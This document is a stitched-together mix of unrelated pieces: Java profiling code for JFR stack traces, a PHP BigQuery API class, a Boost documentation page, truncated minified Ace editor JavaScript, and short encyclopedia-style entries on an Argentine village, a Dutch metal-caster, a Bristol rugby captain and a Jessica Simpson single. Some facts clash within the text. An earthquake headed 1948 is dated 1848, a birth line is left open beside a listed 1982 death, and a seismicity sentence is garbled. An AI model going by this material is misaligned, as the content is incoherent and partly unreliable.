JFR stack trace * serialization. */ public final class SamplerJfrStackTraceSerializer implements SamplerStackTraceSerializer { /** This value is used by multiple threads but only by a single thread at a time. */ private static final CodeInfoDecoder.FrameInfoCursor FRAME_INFO_CURSOR = new CodeInfoDecoder.FrameInfoCursor(); @Override @Uninterruptible(reason = "Prevent JFR recording and epoch change.") public Pointer serializeStackTrace(Pointer rawStackTrace, Pointer bufferEnd, int sampleSize, int sampleHash, boolean isTruncated, long sampleTick, long threadId, long threadState) { Pointer current = rawStackTrace; CIntPointer statusPtr = StackValue.get(CIntPointer.class); JfrStackTraceRepository.JfrStackTraceTableEntry entry = SubstrateJVM.getStackTraceRepo().getOrPutStackTrace(current, WordFactory.unsigned(sampleSize), sampleHash, statusPtr); long stackTraceId = entry.isNull() ? 0 : entry.getId(); int status = statusPtr.read(); if (status == JfrStackTraceRepository.JfrStackTraceTableEntryStatus.INSERTED || status == JfrStackTraceRepository.JfrStackTraceTableEntryStatus.EXISTING_RAW) { /* Walk the IPs and serialize the stacktrace. */ assert current.add(sampleSize).belowThan(bufferEnd); boolean serialized = serializeStackTrace(current, sampleSize, isTruncated, stackTraceId); if (serialized) { SubstrateJVM.getStackTraceRepo().commitSerializedStackTrace(entry); } } else { /* Processing is not needed: skip the rest of the data. */ assert status == JfrStackTraceRepository.JfrStackTraceTableEntryStatus.EXISTING_SERIALIZED || status == JfrStackTraceRepository.JfrStackTraceTableEntryStatus.INSERT_FAILED; } current = current.add(sampleSize); /* * Emit an event depending on the end marker of the raw stack trace. This needs to be done * here because the sampler can't emit the event directly. */ long endMarker = current.readLong(0); if (endMarker == SamplerSampleWriter.EXECUTION_SAMPLE_END) { if (stackTraceId != 0) { ExecutionSampleEvent.writeExecutionSample(sampleTick, threadId, stackTraceId, threadState); } else { JfrThreadLocal.increaseMissedSamples(); } } else { assert endMarker == SamplerSampleWriter.JFR_STACK_TRACE_END; } current = current.add(SamplerSampleWriter.END_MARKER_SIZE); return current; } @Uninterruptible(reason = "Prevent JFR recording and epoch change.") private static boolean serializeStackTrace(Pointer rawStackTrace, int sampleSize, boolean isTruncated, long stackTraceId) { assert sampleSize % Long.BYTES == 0; JfrBuffer targetBuffer = SubstrateJVM.getStackTraceRepo().getCurrentBuffer(); if (targetBuffer.isNull()) { return false; } /* * One IP may correspond to multiple Java-level stack frames. We need to precompute the * number of stack trace elements because the count can't be patched later on * (JfrNativeEventWriter.putInt() would not necessarily reserve enough bytes). */ int numStackTraceElements = visitRawStackTrace(rawStackTrace, sampleSize, WordFactory.nullPointer()); if (numStackTraceElements == 0) { return false; } JfrNativeEventWriterData data = StackValue.get(JfrNativeEventWriterData.class); JfrNativeEventWriterDataAccess.initialize(data, targetBuffer); JfrNativeEventWriter.putLong(data, stackTraceId); JfrNativeEventWriter.putBoolean(data, isTruncated); JfrNativeEventWriter.putInt(data, numStackTraceElements); visitRawStackTrace(rawStackTrace, sampleSize, data); boolean success = JfrNativeEventWriter.commit(data); /* Buffer can get replaced with a larger one. */ SubstrateJVM.getStackTraceRepo().setCurrentBuffer(data.getJfrBuffer()); return success; } @Uninterruptible(reason = "Prevent JFR recording and epoch change.") private static int visitRawStackTrace(Pointer rawStackTrace, int sampleSize, JfrNativeEventWriterData data) { int numStackTraceElements = 0; Pointer rawStackTraceEnd = rawStackTrace.add(sampleSize); Pointer ipPtr = rawStackTrace; while (ipPtr.belowThan(rawStackTraceEnd)) { long ip = ipPtr.readLong(0); numStackTraceElements += visitFrame(data, ip); ipPtr = ipPtr.add(Long.BYTES); } return numStackTraceElements; } @Uninterruptible(reason = "Prevent JFR recording, epoch change, and that the GC frees the CodeInfo.") private static int visitFrame(JfrNativeEventWriterData data, long address) { CodePointer ip = WordFactory.pointer(address); UntetheredCodeInfo untetheredInfo = CodeInfoTable.lookupCodeInfo(ip); if (untetheredInfo.isNull()) { /* Unknown frame. Must not happen for AOT-compiled code. */ VMError.shouldNotReachHere("Stack walk must walk only frames of known code."); } Object tether = CodeInfoAccess.acquireTether(untetheredInfo); try { CodeInfo tetheredCodeInfo = CodeInfoAccess.convert(untetheredInfo, tether); return visitFrame(data, tetheredCodeInfo, ip); } finally { CodeInfoAccess.releaseTether(untetheredInfo, tether); } } @Uninterruptible(reason = "Prevent JFR recording and epoch change.") private static int visitFrame(JfrNativeEventWriterData data, CodeInfo codeInfo, CodePointer ip) { int numStackTraceElements = 0; FRAME_INFO_CURSOR.initialize(codeInfo, ip, false); while (FRAME_INFO_CURSOR.advance()) { if (data.isNonNull()) { FrameInfoQueryResult frame = FRAME_INFO_CURSOR.get(); serializeStackTraceElement(data, frame); } numStackTraceElements++; } return numStackTraceElements; } @Uninterruptible(reason = "Prevent JFR recording and epoch change.") private static void serializeStackTraceElement(JfrNativeEventWriterData data, FrameInfoQueryResult stackTraceElement) { long methodId = SubstrateJVM.getMethodRepo().getMethodId(stackTraceElement.getSourceClass(), stackTraceElement.getSourceMethodName(), stackTraceElement.getSourceMethodSignature(), stackTraceElement.getSourceMethodId(), stackTraceElement.getSourceMethodModifiers()); JfrNativeEventWriter.putLong(data, methodId); JfrNativeEventWriter.putInt(data, stackTraceElement.getSourceLineNumber()); JfrNativeEventWriter.putInt(data, stackTraceElement.getBci()); JfrNativeEventWriter.putLong(data, JfrFrameType.FRAME_AOT_COMPILED.getId()); } } ```
Pairique Chico is a village in Jujuy Province, Argentina, in the Susques Department. Seismicity The seismicity of the area of Jujuy is frequent and low intensity, and mean to severe seismic silence every 40 years. 1863 earthquake: This earthquake on January 4, 1863, measuring 6.4 on the Richter scale, indicated an important milestone in the history of seismic events in Jujuy. It highlighted the need to impose stricter construction codes. 1948 earthquake: The August 25, 1848, measuring 7.0 on the Richter scale, destroyed buildings and opened numerous cracks in wide areas. 2009 earthquake: November 6, 2009, measuring 5.6 on the Richter scale. References Populated places in Jujuy Province
```php <?php /* * * * path_to_url * * Unless required by applicable law or agreed to in writing, software * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the */ namespace Google\Service\BigQueryReservation; class CapacityCommitment extends \Google\Model { /** * @var string */ public $commitmentEndTime; /** * @var string */ public $commitmentStartTime; /** * @var string */ public $edition; protected $failureStatusType = Status::class; protected $failureStatusDataType = ''; /** * @var bool */ public $isFlatRate; /** * @var bool */ public $multiRegionAuxiliary; /** * @var string */ public $name; /** * @var string */ public $plan; /** * @var string */ public $renewalPlan; /** * @var string */ public $slotCount; /** * @var string */ public $state; /** * @param string */ public function setCommitmentEndTime($commitmentEndTime) { $this->commitmentEndTime = $commitmentEndTime; } /** * @return string */ public function getCommitmentEndTime() { return $this->commitmentEndTime; } /** * @param string */ public function setCommitmentStartTime($commitmentStartTime) { $this->commitmentStartTime = $commitmentStartTime; } /** * @return string */ public function getCommitmentStartTime() { return $this->commitmentStartTime; } /** * @param string */ public function setEdition($edition) { $this->edition = $edition; } /** * @return string */ public function getEdition() { return $this->edition; } /** * @param Status */ public function setFailureStatus(Status $failureStatus) { $this->failureStatus = $failureStatus; } /** * @return Status */ public function getFailureStatus() { return $this->failureStatus; } /** * @param bool */ public function setIsFlatRate($isFlatRate) { $this->isFlatRate = $isFlatRate; } /** * @return bool */ public function getIsFlatRate() { return $this->isFlatRate; } /** * @param bool */ public function setMultiRegionAuxiliary($multiRegionAuxiliary) { $this->multiRegionAuxiliary = $multiRegionAuxiliary; } /** * @return bool */ public function getMultiRegionAuxiliary() { return $this->multiRegionAuxiliary; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setPlan($plan) { $this->plan = $plan; } /** * @return string */ public function getPlan() { return $this->plan; } /** * @param string */ public function setRenewalPlan($renewalPlan) { $this->renewalPlan = $renewalPlan; } /** * @return string */ public function getRenewalPlan() { return $this->renewalPlan; } /** * @param string */ public function setSlotCount($slotCount) { $this->slotCount = $slotCount; } /** * @return string */ public function getSlotCount() { return $this->slotCount; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CapacityCommitment::class, 'Google_Service_BigQueryReservation_CapacityCommitment'); ```
Aert van Tricht was a Dutch metal-caster who was active in Maastricht between 1492 and 1501, in Antwerp in 1521 (?). He is sometimes called Aert van Tricht the Elder to distinguish him from his son. His known works include the following: Seven-branched candelabra for the Franciscan monastery in Maastricht, 1492, now lost Brass font for St. John's Cathedral in 's-Hertogenbosch, 1492 Copper railings for the Brotherhood Chapel of St. John's Cathedral in 's-Hertogenbosch, based on wooden models made by Alart du Hameel, 1495-6 Eagle lectern, originally in St. Peter's Church, Leuven, now in The Cloisters, New York City, c. 1500 Arched candelabrum used as a choir screen of Xanten Cathedral, 1501 Bronze tabernacle in Bocholt Church in Bocholt, Belgium, undated Brass font, originally in St Nicolas'Church in Maastricht, now in the Basilica of Our Lady, Maastricht, undated and severely damaged (stripped of all ornaments) References Crab, Jan and F. Lenaerts, The Great Copper Pelican in the Choir: The Lectern from the Church of St. Peter in Louvain, The Metropolitan Museum of Art Bulletin, Vol. 26, No. 10 (Jun., 1968), pp. 401–406. Aert van Tricht at the Netherlands Institute for Art History 15th-century births 1550s deaths Early Netherlandish sculptors Dutch male sculptors People from Maastricht Metalworkers
John Blake (30 May 1933 – ) was a rugby player and teacher who captained Bristol Rugby through one of their most successful periods in the 1950s. Blake, "the most influential individual in the history of the Bristol club", was a fly half, educated at St Brendan's College and Bristol University. He became captain of Bristol in 1957 and was central in the club's adoption of an adventurous and attractive style of play that became known as "rugby Bristol fashion". Blake's approach to the game was immediately successful. During his first season in charge the club records for both points scored and wins in a season were broken. The points scored record was then broken in the two subsequent seasons. Eschewing kicking, Blake emphasised passing and running with the ball. England selectors rejected this rugby philosophy and Blake never represented his country. He did, however play for Gloucestershire, Somerset, the Combined Services, the RAF and the Western Counties. He also played for the Barbarians. By profession a teacher, Blake was an inspirational teacher of history at Henbury School in Bristol, as well as St Brendan's College, and was Headmaster of St Wilfrid's Catholic Comprehensive in Crawley, Sussex. He was buried in the graveyard of the Friary Church, Crawley. Bristol career Appearances - 339 (1953–66) Tries - 92 Conversions - 3 Drop goals - 32 Total points scored 378 Sources David Fox and Mark Hoskins, 100 Greats. Bristol Football Club (RFU), (Tempus Publishing, 2003) 1933 births 1982 deaths Alumni of the University of Bristol English rugby union players Bristol Bears players
"A Little Bit" is a song recorded by American recording artist Jessica Simpson. It was written by Kara DioGuardi, Steve Morales and David Siegel, and was produced by Morales along with Ric Wake. The song was released as the second and final single from Simpson's second studio album Irresistible (2001), on August 28, 2001, through Columbia Records. Musically, the song is a mid-tempo dance-pop song and the lyrics speak about the protagonist wanting changes in a relationship she is in. The song received mostly positive reviews from music critics; most of them appreciated the song's production. It failed to chart in the United States, but reached number sixty-two on Australian Singles Chart. An accompanying music video, directed by Hype Williams, shows Simpson dancing on a futuristic dance floor, along with her backup dancers. Simpson performed the song on her DreamChaser Tour (2001), the 2001 Jingle Bell Bash and a few televised shows. "A Little Bit" was covered by Welsh singer Rosie Ribbons for her unreleased album Misbehaving. Her version was released as a single through Telstar Records and peaked at number nineteen on the UK Singles Chart. The single was promoted through a promotional music video, which shows Ribbons performing dance routines with her dancers, and live performances on various televised appearances like CD:UK and Top of the Pops and Smile. Background and composition "A Little Bit" was written by Kara DioGuardi, Steve Morales and David Siegal, and was produced by Morales and Ric Wake. The song became DioGuardi's first writing credit for an artist from her native country. Simpson's vocals were recorded by Dan Hetzel at Sony Music Studios, New York City, and the track was mixed by Hetzel along with Richie Jones at Cove City Sound Studios, Glen Cove, New York. Keyboard programming was done by Eric Kupper. According to Simpson, "the message behind the song is for guys to listen to the girl". "A guy needs to give a little bit more of himself, a little bit more of his time. It's about the love going so much further, the guy would actually be selfless," she expanded on the song's theme. In the United States, "A Little Bit" was released as the second single from Irresistible. The song saw an airplay-only release there on August 28, 2001, while in Australia, a physical single was issued on October 29, 2001. "A Little Bit" was used to promote Bally Total Fitness and thus, a limited CD single pressing was made available to people who joined the club. The song was also utilized for the company's promotional advertisement campaign. "A Little Bit" is a dance-pop song, composed in a "medium pop" tempo. According to the sheet music published at Musicnotes.com by Alfred Music Publishing, it is written in the key of E minor. Its beat is set in common time, and moves at a tempo of 94 beats per minute. It also has the sequence of Em–C–B/D as its chord progression. Simpson's voice in the song spans from the note of G3 to the high note of D5. Following the same beat-oriented pattern as "Irresistible", "A Little Bit" features piano instrumentation. Simpson sings the lyrics as rapid-fire verses and with start-and-stop hooks. Simpson adopts breathy vocals for the song, and the lyrics talk about what she expects from her partner: "A little more time, a little less wait / A little more heart, a little less break". She also demands healthy changes in the relationship. Critical reception "A Little Bit" garnered mostly positive reviews from music critics. Kirsten Koba of PopMatters gave a positive review, writing "with pop star sass, she belts out [...] proving that she's a girl with attitude — and fierce rhyming ability." Stephen Thomas Erlewine of Allmusic wrote that the song and "Irresistible" were "double-punch" on the album. Chuck Taylor of Billboard praised the song's production, writing that it "locks [this one] inside the head long after it's faded from the speakers." Larry Printz of The Morning Call also gave a favorable review, writing that the song "benefit[s]" from the start-and-stop hooks. Yushaimi Yahya of The Malay Mail, who was critical of the album as a whole, pointed out that Simpson sounded "decent" on the track. However, Chuck Campbell of Daily News noted Simpson's singing as "breathless whispers" and deemed the song as being "heavily processed." The song debuted at number sixty-two on the Australian Singles Chart, on the week dated November 5, 2001, which became its peak position. The single fell to number ninety-six the following week, and dropped out of the chart the week after. Promotion Music video The music video was filmed under the direction of Hype Williams to promote the single. The dance sequence was choreographed by George Hubela (known as GEO) and the video takes place in a futuristic spaceship-like setting where Simpson performs an intricate dance choreography with four male and four female dancers. She wears a rainbow-colored tank top and a mini skirt in the video. At one part, the dancers perform in pairs with Simpson in front of them. Later, Simpson dances beside a male dancer while wearing sunglasses and a white top with a bedazzled American flag. In the video's final scene, Simpson, accompanied by the same dancers from the beginning, perform choreography in a red room, and dance with futuristic pole-stands. The music video also features her younger sister Ashlee Simpson as one of the background dancers. Live performances Simpson included the song on the set-list of her DreamChaser Tour (2001). For the performance on the tour, Simpson was accented by a white top and plaid pants, and also wore a red hat and a red tie. Her performance also made use of poles similar to the one used in music video. She also performed the song on MuchMusic Canada. and the sketch comedy show MADtv. The song was performed along with "Irresistible", "I Wanna Love You Forever", and "I Think I'm in Love with You", at the Jingle Bell Bash, organized by KBKS-FM, in December 2001. The same month, she sang the song on the 2001 Dick Clark's New Year's Rockin' Eve, along with "Irresistible", and on the Hot 107.9 Mistletoe Meltdown. Mark Bialczak of The Post-Standard wrote that Simpson "sure sounded like a diva – especially with the bulked-up tape track that accompanied her singing." Track listing AUS CD single "A Little Bit" – 3:47 "A Little Bit" (Chris 'The Greek' & Guido Club Mix) – 7:54 "A Little Bit" (Chris 'The Greek' & Guido Radio Mix) – 4:29 "Irresistible" (Hex Hector Radio Mix) – 3:32 Credits and personnel Credits for "A Little Bit" are adapted from Irresistible liner notes. Credits for the remixes are adapted from "A Little Bit" CD single liner notes. Steve Morales – writer, co-producer Kara DioGuardi – writer, background vocals David Siegal – writer Ric Wake – producer Janie Barnett – background vocals Margaret Dorn – background vocals Ted Jensen – mastering Jessica Simpson – vocals Chieli Minucci – guitar Dan Hetzel – Engineer Richie Jones – mixer, percussion Remix credits Chris "The Greek" Panaghi – re-mixer Guido Osorio – re-mixer Charts Weekly charts Release history Rosie Ribbons version "A Little Bit" was recorded by English singer and Pop Idol runner-up Rosie Ribbons, for her debut studio album Misbehaving. Her version has an "American vibe" and derives from the genres of pop and R&B. A writer for the Western Mail noted that the song contains influences of Samantha Mumba tracks. The song was released on January 13, 2003, through Telstar Records, as the second single from the album. It reached number nineteen on the UK Singles Chart, and was also accompanied by a music video, which showed Ribbons dancing with her backup dancers. She performed the song on various televised appearances such as CD:UK and Top of the Pops. She also toured with Liberty X and promoted the song. Release and reception Ribbons' version of "A Little Bit" was released as the second single from her debut album titled Misbehaving, on January 13, 2003, through Telstar Records. The album was recorded, but due to Telstar going bankrupt, it was never released. The song earned mixed reviews from critics. A staff of Tourdates.co.uk gave a favorable review commending Ribbons' vocal display. The reviewer added "[so] often we are bombarded with wannabes with weak vocals and insipid songs, [Rosie] shows us that there is life after pop idol and with 'a little bit' of cred." Music Week also gave a positive review, noting the song was "catchy". However, Ian Hyland, writing for the Sunday Mirror was critical of the song, giving it a grade of 6 out of 10. He remarked that Ribbons "fails" at doing "sexy R'n'B". Similarly, Julie MacCaskill of the Daily Record dismissed it as "a lacklustre affair with the wannabe star ditching her Mariah sound- a-like singing in favour of becoming a Kylie clone". The single debuted at number nineteen on the UK Singles Chart, the week dated January 25, 2003. The position became its peak position. The following week, the song dropped to number thirty-seven and the week after exited the top forty. Promotion A promotional music video for the song was filmed, which showed Ribbons wearing heavy makeup and donning a stylish costume. The first scene of the music video takes place in an elevator-like set. Ribbons is shown singing in the elevator. Then, as the video progresses she is shown dancing with her backup dancers, in a set with the lyrics of the song inscribed on its walls. Then, Ribbons is shown seducing a man in the elevator. In the last scene Ribbons, along with the backup dancers, dance on a parking lot like set. The music video premiered on CD:UK on December 7, 2002. Dean Piper of The Mirror noted the video to be "groovy". "A Little Bit" was first performed on the Party in the Park event in 2002. Later, she performed it on various televised appearances such as the British chart show Top of the Pops, Smile and CD:UK. She also appeared on Smash Hits' chart countdown and promoted the song. In March 2003, she toured with British pop group Liberty X. Track listing UK Enhanced CD Single "A Little Bit" (Radio edit) – 3:44 "A Little Bit" (Rishi 'Smooth' Rich remix) – 4:27 "A Little Bit" (M*A*S*H Main Vocal mix) – 6:34 "A Little Bit" (Rishi Rich remix) – 3:35 "A Little Bit" (Video) UK 12" Vinyl Single "A Little Bit" (Bini & Martini High Pressure Mix) "A Little Bit" (Bini & Martini High Pressure Dub) Credits and personnel Credits are adapted from "A Little Bit" CD single. Steve Morales – writer Kara DioGuardi – writer David Siegal – writer ICON – producer Rishi Rich – re-mixer M*A*S*H – re-mixer Bini & Martini – re-mixer Joanna Barnes – rap Tanya Scarborough – rap References External links Jessica Simpson "A Little Bit" music video at MTV.com 2001 singles Jessica Simpson songs Rosie Ribbons songs Dance-pop songs Music videos directed by Hype Williams Songs written by Kara DioGuardi Song recordings produced by Ric Wake Songs written by Steve Morales Songs written by David Siegel (musician) 2001 songs Columbia Records singles
```html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "path_to_url"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>Part&#160;II.&#160;Boost Tools</title> <link rel="stylesheet" href="../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.79.1"> <link rel="home" href="index.html" title="The Boost C++ Libraries BoostBook Documentation Subset"> <link rel="up" href="index.html" title="The Boost C++ Libraries BoostBook Documentation Subset"> <link rel="prev" href="SignedInteger.html" title="Concept SignedInteger"> <link rel="next" href="boostbook.html" title="Chapter&#160;48.&#160;The BoostBook Documentation Format"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../boost.png"></td> <td align="center"><a href="../../index.html">Home</a></td> <td align="center"><a href="../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="path_to_url">People</a></td> <td align="center"><a href="path_to_url">FAQ</a></td> <td align="center"><a href="../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="SignedInteger.html"><img src="../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="index.html"><img src="../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="index.html"><img src="../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="boostbook.html"><img src="../../doc/src/images/next.png" alt="Next"></a> </div> <div class="part"> <div class="titlepage"><div><div><h1 class="title"> <a name="tools"></a>Part&#160;II.&#160;Boost Tools</h1></div></div></div> <div class="partintro"> <div></div> <p> Boost developers, testers, and maintainers have developed various programs to help with the administration of the Boost Libraries. Like everything else about Boost, these tools are available in source form, and are part of the regular Boost distribution. </p> <p> Users may find these tools useful when porting Boost libraries to a new platform, or for use with their own applications. </p> <div class="toc"> <p><b>Table of Contents</b></p> <dl class="toc"> <dt><span class="chapter"><a href="boostbook.html">48. The BoostBook Documentation Format</a></span></dt> <dd><dl> <dt><span class="section"><a href="boostbook.html#boostbook.introduction">Introduction</a></span></dt> <dt><span class="section"><a href="boostbook/getting/started.html">Getting Started</a></span></dt> <dt><span class="section"><a href="boostbook/documenting.html">Documenting libraries</a></span></dt> <dt><span class="section"><a href="boostbook/together.html">Bringing Together a BoostBook Document</a></span></dt> <dt><span class="section"><a href="reference.html">Reference</a></span></dt> </dl></dd> <dt><span class="chapter"><a href="bbv2.html">49. Boost.Build User Manual</a></span></dt> <dd><dl> <dt><span class="section"><a href="bbv2.html#bbv2.installation">Installation</a></span></dt> <dt><span class="section"><a href="bbv2/tutorial.html">Tutorial</a></span></dt> <dt><span class="section"><a href="bbv2/overview.html">Overview</a></span></dt> <dt><span class="section"><a href="bbv2/tasks.html">Common tasks</a></span></dt> <dt><span class="section"><a href="bbv2/util.html">Utilities</a></span></dt> <dt><span class="section"><a href="bbv2/reference.html">Reference</a></span></dt> <dt><span class="section"><a href="bbv2/extender.html">Extender Manual</a></span></dt> <dt><span class="section"><a href="bbv2/faq.html">Frequently Asked Questions</a></span></dt> <dt><span class="section"><a href="examples.html">Examples</a></span></dt> </dl></dd> <dt><span class="chapter"><a href="jam.html">50. Boost.Jam : 3.1.19</a></span></dt> <dd><dl> <dt><span class="section"><a href="jam.html#jam.building">Building B2</a></span></dt> <dt><span class="section"><a href="jam/language.html">Language</a></span></dt> <dt><span class="section"><a href="jam/miscellaneous.html">Miscellaneous</a></span></dt> <dt><span class="section"><a href="jam/history.html">History</a></span></dt> </dl></dd> <dt><span class="chapter"><a href="quickbook.html">51. Quickbook 1.7</a></span></dt> <dd><dl> <dt><span class="section"><a href="quickbook.html#quickbook.intro">Introduction</a></span></dt> <dt><span class="section"><a href="quickbook/change_log.html">Change Log</a></span></dt> <dt><span class="section"><a href="quickbook/command_line.html">Command Line Usage</a></span></dt> <dt><span class="section"><a href="quickbook/syntax.html">Syntax Summary</a></span></dt> <dt><span class="section"><a href="quickbook/syntax/structure.html">Document Structure</a></span></dt> <dt><span class="section"><a href="quickbook/syntax/phrase.html">Phrase Level Elements</a></span></dt> <dt><span class="section"><a href="quickbook/syntax/block.html">Block Level Elements</a></span></dt> <dt><span class="section"><a href="quickbook/versions.html">Language Versions</a></span></dt> <dt><span class="section"><a href="quickbook/install.html">Installation and configuration</a></span></dt> <dt><span class="section"><a href="quickbook/editors.html">Editor Support</a></span></dt> <dt><span class="section"><a href="quickbook/faq.html">Frequently Asked Questions</a></span></dt> <dt><span class="section"><a href="quickbook/ref.html">Quick Reference</a></span></dt> </dl></dd> </dl> </div> </div> </div> <table xmlns:rev="path_to_url~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer"></div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="SignedInteger.html"><img src="../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="index.html"><img src="../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="index.html"><img src="../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="boostbook.html"><img src="../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html> ```
```javascript ace.define("ace/mode/doc_comment_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";var r=e("../lib/oop"),i=e("./text_highlight_rules").TextHighlightRules,s=function(){this.$rules={start:[{token:"comment.doc.tag",regex:"@[\\w\\d_]+"},s.getTagRule(),{defaultToken:"comment.doc",caseInsensitive:!0}]}};r.inherits(s,i),s.getTagRule=function(e){return{token:"comment.doc.tag.storage.type",regex:"\\b(?:TODO|FIXME|XXX|HACK)\\b"}},s.getStartRule=function(e){return{token:"comment.doc",regex:"\\/\\*(?=\\*)",next:e}},s.getEndRule=function(e){return{token:"comment.doc",regex:"\\*\\/",next:e}},t.DocCommentHighlightRules=s}),ace.define("ace/mode/javascript_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/doc_comment_highlight_rules","ace/mode/text_highlight_rules"],function(e,t,n){"use strict";function a(){var e=o.replace("\\d","\\d\\-"),t={onMatch:function(e,t,n){var r=e.charAt(1)=="/"?2:1;if(r==1)t!=this.nextState?n.unshift(this.next,this.nextState,0):n.unshift(this.next),n[2]++;else if(r==2&&t==this.nextState){n[1]--;if(!n[1]||n[1]<0)n.shift(),n.shift()}return[{type:"meta.tag.punctuation."+(r==1?"":"end-")+"tag-open.xml",value:e.slice(0,r)},{type:"meta.tag.tag-name.xml",value:e.substr(r)}]},regex:"</?"+e+"",next:"jsxAttributes",nextState:"jsx"};this.$rules.start.unshift(t);var n={regex:"{",token:"paren.quasi.start",push:"start"};this.$rules.jsx=[n,t,{include:"reference"},{defaultToken:"string"}],this.$rules.jsxAttributes=[{token:"meta.tag.punctuation.tag-close.xml",regex:"/?>",onMatch:function(e,t,n){return t==n[0]&&n.shift(),e.length==2&&(n[0]==this.nextState&&n[1]--,(!n[1]||n[1]<0)&&n.splice(0,2)),this.next=n[0]||"start",[{type:this.token,value:e}]},nextState:"jsx"},n,f("jsxAttributes"),{token:"entity.other.attribute-name.xml",regex:e},{token:"keyword.operator.attribute-equals.xml",regex:"="},{token:"text.tag-whitespace.xml",regex:"\\s+"},{token:"string.attribute-value.xml",regex:"'",stateName:"jsx_attr_q",push:[{token:"string.attribute-value.xml",regex:"'",next:"pop"},{include:"reference"},{defaultToken:"string.attribute-value.xml"}]},{token:"string.attribute-value.xml",regex:'"',stateName:"jsx_attr_qq",push:[{token:"string.attribute-value.xml",regex:'"',next:"pop"},{include:"reference"},{defaultToken:"string.attribute-value.xml"}]},t],this.$rules.reference=[{token:"constant.language.escape.reference.xml",regex:"(?:&#[0-9]+;)|(?:&#x[0-9a-fA-F]+;)|(?:&[a-zA-Z0-9_:\\.-]+;)"}]}function f(e){return[{token:"comment",regex:/\/\*/,next:[i.getTagRule(),{token:"comment",regex:"\\*\\/",next:e||"pop"},{defaultToken:"comment",caseInsensitive:!0}]},{token:"comment",regex:"\\/\\/",next:[i.getTagRule(),{token:"comment",regex:"$|^",next:e||"pop"},{defaultToken:"comment",caseInsensitive:!0}]}]}var r=e("../lib/oop"),i=e("./doc_comment_highlight_rules").DocCommentHighlightRules,s=e("./text_highlight_rules").TextHighlightRules,o="[a-zA-Z\\$_\u00a1-\uffff][a-zA-Z\\d\\$_\u00a1-\uffff]*",u=function(e){var t=this.createKeywordMapper({"variable.language":"Array|Boolean|Date|Function|Iterator|Number|Object|RegExp|String|Proxy|Namespace|QName|XML|XMLList|ArrayBuffer|Float32Array|Float64Array|Int16Array|Int32Array|Int8Array|Uint16Array|Uint32Array|Uint8Array|Uint8ClampedArray|Error|EvalError|InternalError|RangeError|ReferenceError|StopIteration|SyntaxError|TypeError|URIError|decodeURI|decodeURIComponent|encodeURI|encodeURIComponent|eval|isFinite|isNaN|parseFloat|parseInt|JSON|Math|this|arguments|prototype|window|document",keyword:"const|yield|import|get|set|async|await|break|case|catch|continue|default|delete|do|else|finally|for|function|if|in|of|instanceof|new|return|switch|throw|try|typeof|let|var|while|with|debugger|__parent__|__count__|escape|unescape|with|__proto__|class|enum|extends|super|export|implements|private|public|interface|package|protected|static","storage.type":"const|let|var|function","constant.language":"null|Infinity|NaN|undefined","support.function":"alert","constant.language.boolean":"true|false"},"identifier"),n="case|do|else|finally|in|instanceof|return|throw|try|typeof|yield|void",r="\\\\(?:x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|u{[0-9a-fA-F]{1,6}}|[0-2][0-7]{0,2}|3[0-7][0-7]?|[4-7][0-7]?|.)";this.$rules={no_regex:[i.getStartRule("doc-start"),f("no_regex"),{token:"string",regex:"'(?=.)",next:"qstring"},{token:"string",regex:'"(?=.)',next:"qqstring"},{token:"constant.numeric",regex:/0(?:[xX][0-9a-fA-F]+|[oO][0-7]+|[bB][01]+)\b/},{token:"constant.numeric",regex:/(?:\d\d*(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+\b)?/},{token:["storage.type","punctuation.operator","support.function","punctuation.operator","entity.name.function","text","keyword.operator"],regex:"("+o+")(\\.)(prototype)(\\.)("+o+")(\\s*)(=)",next:"function_arguments"},{token:["storage.type","punctuation.operator","entity.name.function","text","keyword.operator","text","storage.type","text","paren.lparen"],regex:"("+o+")(\\.)("+o+")(\\s*)(=)(\\s*)(function)(\\s*)(\\()",next:"function_arguments"},{token:["entity.name.function","text","keyword.operator","text","storage.type","text","paren.lparen"],regex:"("+o+")(\\s*)(=)(\\s*)(function)(\\s*)(\\()",next:"function_arguments"},{token:["storage.type","punctuation.operator","entity.name.function","text","keyword.operator","text","storage.type","text","entity.name.function","text","paren.lparen"],regex:"("+o+")(\\.)("+o+")(\\s*)(=)(\\s*)(function)(\\s+)(\\w+)(\\s*)(\\()",next:"function_arguments"},{token:["storage.type","text","entity.name.function","text","paren.lparen"],regex:"(function)(\\s+)("+o+")(\\s*)(\\()",next:"function_arguments"},{token:["entity.name.function","text","punctuation.operator","text","storage.type","text","paren.lparen"],regex:"("+o+")(\\s*)(:)(\\s*)(function)(\\s*)(\\()",next:"function_arguments"},{token:["text","text","storage.type","text","paren.lparen"],regex:"(:)(\\s*)(function)(\\s*)(\\()",next:"function_arguments"},{token:"keyword",regex:"from(?=\\s*('|\"))"},{token:"keyword",regex:"(?:"+n+")\\b",next:"start"},{token:["support.constant"],regex:/that\b/},{token:["storage.type","punctuation.operator","support.function.firebug"